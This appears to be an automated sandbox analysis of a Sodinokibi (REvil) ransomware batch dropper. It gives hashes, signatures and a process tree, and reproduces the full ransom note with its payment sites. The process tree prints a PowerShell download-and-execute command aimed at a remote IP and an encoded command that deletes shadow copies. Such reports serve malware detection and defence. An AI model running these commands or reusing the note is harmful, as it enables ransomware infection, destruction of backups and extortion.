Overview

overview

10

Static

static

Me2v4MuS.bat

windows7_x64

10

Me2v4MuS.bat

windows10_x64

10

Analysis

  • max time kernel
    107s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    22-04-2020 18:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Me2v4MuS.bat

  • Size

    197B

  • MD5

    9fe4e52640dd89fd2bffd7679d5427c1

  • SHA1

    cb782152f0425e231fc8a2e8efa34a0fb13b07a9

  • SHA256

    431072d009a13cdfad92609c787cd58680f40d778bb435bf6c6eb29edc7558a0

  • SHA512

    f9507bfd78c53ec37cb98e3060f4f88ef6326493cc1dcd7c9248c71005495a3a5e97d0ef27a95ee79c3128ac7993e97483b1d2fbdffbabf627bab9386d7079be

Score
10/10
persistenceransomwaresodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Me2v4MuS

Extracted

Path

C:\6n56wyp030-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 6n56wyp030. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F103D4F6A74E6F10 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F103D4F6A74E6F10 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: gVekBIOf2XFGOuuBAJCD347FbgIldb+/EV844vMlwfFN+q0jHoVf1W/oEPqn/m6k GDdbazBlvJVujSb3jYetCxHdxjDV7oZS+ZPVi7nqWCLEDjTWZl66a8pYYYmya92Y KPvOSDRWEnSXIawkUReQ87Sx1G9Bzzq8FgUjz/5fpgDq9uai7kdw3g8KF0ltybyq Wxme1gAvNAf+MsLrBYuX7GeyLDV5qaJj746L01P5XYr+i6/RWGrOkGa9GVhsmLYt zuKYf0kvLc4Lum7wAEewD/7T7YcIV7vPY+SRZ1/xGYDaB3Fv3UblNoNMku2pZotx w1nNzAWgGukdDfY0hu4rS88q/QIJqA4vypYvnkUSDXuse5wC3oexFxiZesPoe5/c Ds7QxYzU8mO0l7XxA5TW2Cx2EiMhQD0uKKBDlzykJLjHaWwHC96fuaa0QtFmsADh nkKdwKlk7D5HrlD3ghaRxzzXZOMlkpKICC22IfTM0MgyEEDxZrc1T/rAIi0yhpMT OVJlnwijJoPDke4e5fip+SQhc71ZhcRQWUb5TUoNaSomkFuWbuEP1kVsdPUIu9sG uVaLXyuna6jIBS8Dio7L9rJcQ+RScpQAdVjFkNlOjpVicgsTVt6/CbaPJzKSYR0h Fq57QfWYsyAUxmGWc6R0FpnL8H3yOlgba+PEGq0Bfg1QP42tpnoN2lROeGOqMJ8m VprwSyyNRy2ntAqxeZVSSCHJhFNuHSRBUlmD9dLdKFzmxChqhL9ERlgFliqF9lPr O9ZUWgz3rPHrGX7xsaLeUjYuiOpWJukadZo0xQV1BXx7Qh6oL3xpi8QZGjG/TG9Z 6YLFgQpHonOJsXOGaHvluTgKd6E9k9j5ohmbWofczXSae4OY998WtXFZigRbvZHR Agg84pT+QMwhHb1706dbnCbXYhdKgJ2jerOOjBx6Qz0+vNsI1cGAacOzCEPkWPsY 8+qXSYlbqv+DtdyNSD0o0VlJXixPomxfQbGzFS5hVrFfkQZ2z0rgh3Ztc8163bic ddG49mUKKA3pHWPcMePAyHv+PWRw/rA7S1IECF0QAy3P88H3SOl7cm4nIWCnECAW oQeVQlfXD1mJenZfK7NXZB3vMIsOGfg+cJj1TedHdvr9xVQyPEXGMuS3aUlAAjlu Ce+1oQe7OgZn05/u+MpsKfyHqtFYjNqE1s09nGb6/GhFUBgn8u/Yo3aQlva2iyOv YC5BiIkD8GJc70mCYQ66dFuoPRV43YK+nL8gYqY7j5zwU4zFGtpcMOetttBxz9Pw DeFmXRQVWEv6LmNvSydLE3tcgk809OCsPBkb0H+y5qZcEnmTgi6a+Q== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F103D4F6A74E6F10

http://decryptor.cc/F103D4F6A74E6F10

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Me2v4MuS.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me2v4MuS');Invoke-BXOVRYVWNFYNYU;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      PID:2040
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1412
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1568

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_05471756-4b9c-45e9-8ddd-05fab605d637
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_20b90e15-f237-499e-a823-6772568bf000
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_37386d62-281a-4a91-a575-6755e45f3238
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5028523d-10aa-4674-b3d1-9db9e7b9fbf6
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a24b3c29-8785-47a4-90c7-9951cb5bf055
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3feaac6-0199-4ad4-87ff-a4b7cbd02223
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit